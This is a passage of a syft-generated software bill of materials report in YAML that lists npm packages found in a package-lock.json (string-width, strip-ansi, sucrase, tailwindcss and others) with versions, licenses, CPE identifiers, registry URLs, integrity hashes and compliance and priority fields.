spdxExpression: MIT + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:streamsearch:streamsearch:1.1.0:*:*:*:*:*:*:* + source: syft-generated + purl: pkg:npm/streamsearch@1.1.0 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/streamsearch/-/streamsearch-1.1.0.tgz + integrity: sha512-Mcc5wHehp9aXz1ax6bZUyY5afg9u2rv5cqQI3mRrYkGC8rW2hM02jWuwjtL++LS5qinSyhj2QfLyNsuc+VsExg== + dependencies: null + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: d28f82c740f787aa + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: string-width 4.2.3' + title: string-width 4.2.3 + description: 'Package discovered: string-width 4.2.3' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: 6c7ed5b8c0bd71e8 + name: string-width + version: 4.2.3 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: MIT + spdxExpression: MIT + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:string-width:string-width:4.2.3:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:string-width:string_width:4.2.3:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:string_width:string-width:4.2.3:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:string_width:string_width:4.2.3:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:string:string-width:4.2.3:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:string:string_width:4.2.3:*:*:*:*:*:*:* + source: syft-generated + purl: pkg:npm/string-width@4.2.3 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/string-width/-/string-width-4.2.3.tgz + integrity: sha512-wKyQRQpjJ0sIp62ErSZdGsjMJWsap5oRNihHhu6G7JVO/9jIB6UyevL+tXuOqrng8j/cxKTWyWUwvSTriiZz/g== + dependencies: + emoji-regex: ^8.0.0 + is-fullwidth-code-point: ^3.0.0 + strip-ansi: ^6.0.1 + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: a6a2288a986748af + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: string-width 5.1.2' + title: string-width 5.1.2 + description: 'Package discovered: string-width 5.1.2' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: 303a44f8f6ca903e + name: string-width + version: 5.1.2 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: MIT + spdxExpression: MIT + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:string-width:string-width:5.1.2:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:string-width:string_width:5.1.2:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:string_width:string-width:5.1.2:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:string_width:string_width:5.1.2:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:string:string-width:5.1.2:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:string:string_width:5.1.2:*:*:*:*:*:*:* + source: syft-generated + purl: pkg:npm/string-width@5.1.2 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/string-width/-/string-width-5.1.2.tgz + integrity: sha512-HnLOCR3vjcY8beoNLtcjZ5/nxn2afmME6lhrDrebokqMap+XbeW8n9TXpPDOqdGK5qcI3oT0GKTW6wC7EMiVqA== + dependencies: + eastasianwidth: ^0.2.0 + emoji-regex: ^9.2.2 + strip-ansi: ^7.0.1 + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: d318d3d155c6a9dd + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: string_decoder 1.1.1' + title: string_decoder 1.1.1 + description: 'Package discovered: string_decoder 1.1.1' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: 829e7f04cb28f180 + name: string_decoder + version: 1.1.1 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: MIT + spdxExpression: MIT + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:string-decoder:string-decoder:1.1.1:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:string-decoder:string_decoder:1.1.1:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:string_decoder:string-decoder:1.1.1:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:string_decoder:string_decoder:1.1.1:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:string:string-decoder:1.1.1:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:string:string_decoder:1.1.1:*:*:*:*:*:*:* + source: syft-generated + purl: pkg:npm/string_decoder@1.1.1 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/string_decoder/-/string_decoder-1.1.1.tgz + integrity: sha512-n/ShnvDi6FHbbVfviro+WojiFzv+s8MPMHBczVePfUpDJLwoLT0ht1l4YwBCbi8pJAveEEdnkHyPyTP/mzRfwg== + dependencies: + safe-buffer: ~5.1.0 + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: 42e775567d560303 + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: string_decoder 1.3.0' + title: string_decoder 1.3.0 + description: 'Package discovered: string_decoder 1.3.0' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: 31e1990d6adabf2b + name: string_decoder + version: 1.3.0 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: MIT + spdxExpression: MIT + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:string-decoder:string-decoder:1.3.0:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:string-decoder:string_decoder:1.3.0:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:string_decoder:string-decoder:1.3.0:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:string_decoder:string_decoder:1.3.0:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:string:string-decoder:1.3.0:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:string:string_decoder:1.3.0:*:*:*:*:*:*:* + source: syft-generated + purl: pkg:npm/string_decoder@1.3.0 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/string_decoder/-/string_decoder-1.3.0.tgz + integrity: sha512-hkRX8U1WjJFd8LsDJ2yQ/wWWxaopEsABU1XfkM8A+j0+85JAGppt16cr1Whg6KIbb4okU6Mql6BOj+uup/wKeA== + dependencies: + safe-buffer: ~5.2.0 + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: 611033baae4657b2 + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: strip-ansi 6.0.1' + title: strip-ansi 6.0.1 + description: 'Package discovered: strip-ansi 6.0.1' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: e47d9046945afbeb + name: strip-ansi + version: 6.0.1 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: MIT + spdxExpression: MIT + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:strip-ansi:strip-ansi:6.0.1:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:strip-ansi:strip_ansi:6.0.1:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:strip_ansi:strip-ansi:6.0.1:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:strip_ansi:strip_ansi:6.0.1:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:strip:strip-ansi:6.0.1:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:strip:strip_ansi:6.0.1:*:*:*:*:*:*:* + source: syft-generated + purl: pkg:npm/strip-ansi@6.0.1 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/strip-ansi/-/strip-ansi-6.0.1.tgz + integrity: sha512-Y38VPSHcqkFrCpFnQ9vuSXmquuv5oXOKpGeT6aGrr3o3Gc9AlVa6JBfUSOCnbxGGZF+/0ooI7KrPuUSztUdU5A== + dependencies: + ansi-regex: ^5.0.1 + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: ca95150df82b38c3 + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: strip-ansi 7.2.0' + title: strip-ansi 7.2.0 + description: 'Package discovered: strip-ansi 7.2.0' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: efdaea275ca01865 + name: strip-ansi + version: 7.2.0 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: MIT + spdxExpression: MIT + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:strip-ansi:strip-ansi:7.2.0:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:strip-ansi:strip_ansi:7.2.0:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:strip_ansi:strip-ansi:7.2.0:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:strip_ansi:strip_ansi:7.2.0:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:strip:strip-ansi:7.2.0:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:strip:strip_ansi:7.2.0:*:*:*:*:*:*:* + source: syft-generated + purl: pkg:npm/strip-ansi@7.2.0 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/strip-ansi/-/strip-ansi-7.2.0.tgz + integrity: sha512-yDPMNjp4WyfYBkHnjIRLfca1i6KMyGCtsVgoKe/z1+6vukgaENdgGBZt+ZmKPc4gavvEZ5OgHfHdrazhgNyG7w== + dependencies: + ansi-regex: ^6.2.2 + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: 680b8434591c36cc + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: strnum 2.2.3' + title: strnum 2.2.3 + description: 'Package discovered: strnum 2.2.3' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: 9368f059f77a6fca + name: strnum + version: 2.2.3 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: MIT + spdxExpression: MIT + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:strnum:strnum:2.2.3:*:*:*:*:*:*:* + source: syft-generated + purl: pkg:npm/strnum@2.2.3 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/strnum/-/strnum-2.2.3.tgz + integrity: sha512-oKx6RUCuHfT3oyVjtnrmn19H1SiCqgJSg+54XqURKp5aCMbrXrhLjRN9TjuwMjiYstZ0MzDrHqkGZ5dFTKd+zg== + dependencies: null + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: 71b1b284c1af24b8 + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: stubs 3.0.0' + title: stubs 3.0.0 + description: 'Package discovered: stubs 3.0.0' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: 10401a0421b092a3 + name: stubs + version: 3.0.0 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: MIT + spdxExpression: MIT + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:stubs:stubs:3.0.0:*:*:*:*:*:*:* + source: syft-generated + purl: pkg:npm/stubs@3.0.0 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/stubs/-/stubs-3.0.0.tgz + integrity: sha512-PdHt7hHUJKxvTCgbKX9C1V/ftOcjJQgz8BZwNfV5c4B6dcGqlpelTbJ999jBGZ2jYiPAwcX5dP6oBwVlBlUbxw== + dependencies: null + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: a4561300304da31c + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: styled-jsx 5.1.1' + title: styled-jsx 5.1.1 + description: 'Package discovered: styled-jsx 5.1.1' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: b71f2c964dcb79d3 + name: styled-jsx + version: 5.1.1 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: MIT + spdxExpression: MIT + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:styled-jsx:styled-jsx:5.1.1:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:styled-jsx:styled_jsx:5.1.1:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:styled_jsx:styled-jsx:5.1.1:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:styled_jsx:styled_jsx:5.1.1:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:styled:styled-jsx:5.1.1:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:styled:styled_jsx:5.1.1:*:*:*:*:*:*:* + source: syft-generated + purl: pkg:npm/styled-jsx@5.1.1 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/styled-jsx/-/styled-jsx-5.1.1.tgz + integrity: sha512-pW7uC1l4mBZ8ugbiZrcIsiIvVx1UmTfw7UkC3Um2tmfUq9Bhk8IiyEIPl6F8agHgjzku6j0xQEZbfA5uSgSaCw== + dependencies: + client-only: 0.0.1 + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: d085117a189c2037 + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: sucrase 3.35.1' + title: sucrase 3.35.1 + description: 'Package discovered: sucrase 3.35.1' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: 302884898f3a35c4 + name: sucrase + version: 3.35.1 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: MIT + spdxExpression: MIT + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:sucrase:sucrase:3.35.1:*:*:*:*:*:*:* + source: syft-generated + purl: pkg:npm/sucrase@3.35.1 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/sucrase/-/sucrase-3.35.1.tgz + integrity: sha512-DhuTmvZWux4H1UOnWMB3sk0sbaCVOoQZjv8u1rDoTV0HTdGem9hkAZtl4JZy8P2z4Bg0nT+YMeOFyVr4zcG5Tw== + dependencies: + '@jridgewell/gen-mapping': ^0.3.2 + commander: ^4.0.0 + lines-and-columns: ^1.1.6 + mz: ^2.7.0 + pirates: ^4.0.1 + tinyglobby: ^0.2.11 + ts-interface-checker: ^0.1.9 + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: 57ae1f3ed312e075 + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: supports-preserve-symlinks-flag 1.0.0' + title: supports-preserve-symlinks-flag 1.0.0 + description: 'Package discovered: supports-preserve-symlinks-flag 1.0.0' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: cb6982ee071dbb85 + name: supports-preserve-symlinks-flag + version: 1.0.0 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: MIT + spdxExpression: MIT + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:supports-preserve-symlinks-flag:supports-preserve-symlinks-flag:1.0.0:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:supports-preserve-symlinks-flag:supports_preserve_symlinks_flag:1.0.0:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:supports_preserve_symlinks_flag:supports-preserve-symlinks-flag:1.0.0:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:supports_preserve_symlinks_flag:supports_preserve_symlinks_flag:1.0.0:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:supports-preserve-symlinks:supports-preserve-symlinks-flag:1.0.0:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:supports-preserve-symlinks:supports_preserve_symlinks_flag:1.0.0:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:supports_preserve_symlinks:supports-preserve-symlinks-flag:1.0.0:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:supports_preserve_symlinks:supports_preserve_symlinks_flag:1.0.0:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:supports-preserve:supports-preserve-symlinks-flag:1.0.0:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:supports-preserve:supports_preserve_symlinks_flag:1.0.0:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:supports_preserve:supports-preserve-symlinks-flag:1.0.0:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:supports_preserve:supports_preserve_symlinks_flag:1.0.0:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:supports:supports-preserve-symlinks-flag:1.0.0:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:supports:supports_preserve_symlinks_flag:1.0.0:*:*:*:*:*:*:* + source: syft-generated + purl: pkg:npm/supports-preserve-symlinks-flag@1.0.0 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/supports-preserve-symlinks-flag/-/supports-preserve-symlinks-flag-1.0.0.tgz + integrity: sha512-ot0WnXS9fgdkgIcePe6RHNk1WA8+muPa6cSjeR3V8K27q9BB1rTE3R1p7Hv0z1ZyAc8s6Vvv8DIyWf681MAt0w== + dependencies: null + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: 7b659eb857ace717 + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: svg-arc-to-cubic-bezier 3.2.0' + title: svg-arc-to-cubic-bezier 3.2.0 + description: 'Package discovered: svg-arc-to-cubic-bezier 3.2.0' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: 03465a3bffd322b9 + name: svg-arc-to-cubic-bezier + version: 3.2.0 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: ISC + spdxExpression: ISC + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:svg-arc-to-cubic-bezier:svg-arc-to-cubic-bezier:3.2.0:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:svg-arc-to-cubic-bezier:svg_arc_to_cubic_bezier:3.2.0:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:svg_arc_to_cubic_bezier:svg-arc-to-cubic-bezier:3.2.0:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:svg_arc_to_cubic_bezier:svg_arc_to_cubic_bezier:3.2.0:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:svg-arc-to-cubic:svg-arc-to-cubic-bezier:3.2.0:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:svg-arc-to-cubic:svg_arc_to_cubic_bezier:3.2.0:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:svg_arc_to_cubic:svg-arc-to-cubic-bezier:3.2.0:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:svg_arc_to_cubic:svg_arc_to_cubic_bezier:3.2.0:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:svg-arc-to:svg-arc-to-cubic-bezier:3.2.0:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:svg-arc-to:svg_arc_to_cubic_bezier:3.2.0:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:svg_arc_to:svg-arc-to-cubic-bezier:3.2.0:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:svg_arc_to:svg_arc_to_cubic_bezier:3.2.0:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:svg-arc:svg-arc-to-cubic-bezier:3.2.0:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:svg-arc:svg_arc_to_cubic_bezier:3.2.0:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:svg_arc:svg-arc-to-cubic-bezier:3.2.0:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:svg_arc:svg_arc_to_cubic_bezier:3.2.0:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:svg:svg-arc-to-cubic-bezier:3.2.0:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:svg:svg_arc_to_cubic_bezier:3.2.0:*:*:*:*:*:*:* + source: syft-generated + purl: pkg:npm/svg-arc-to-cubic-bezier@3.2.0 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/svg-arc-to-cubic-bezier/-/svg-arc-to-cubic-bezier-3.2.0.tgz + integrity: sha512-djbJ/vZKZO+gPoSDThGNpKDO+o+bAeA4XQKovvkNCqnIS2t+S4qnLAGQhyyrulhCFRl1WWzAp0wUDV8PpTVU3g== + dependencies: null + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: 0702fc96b298768b + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: tailwindcss 3.4.19' + title: tailwindcss 3.4.19 + description: 'Package discovered: tailwindcss 3.4.19' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: 4180007fa4dbcaa3 + name: tailwindcss + version: 3.4.19 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: MIT + spdxExpression: MIT + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:tailwindcss:tailwindcss:3.4.19:*:*:*:*:*:*:* + source: syft-generated + purl: pkg:npm/tailwindcss@3.4.19 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/tailwindcss/-/tailwindcss-3.4.19.tgz + integrity: sha512-3ofp+LL8E+pK/JuPLPggVAIaEuhvIz4qNcf3nA1Xn2o/7fb7s/TYpHhwGDv1ZU3PkBluUVaF8PyCHcm48cKLWQ== + dependencies: + '@alloc/quick-lru': ^5.2.0 + arg: ^5.0.2 + chokidar: ^3.6.0 + didyoumean: ^1.2.2 + dlv: ^1.1.3 + fast-glob: ^3.3.2 + glob-parent: ^6.0.2 + is-glob: 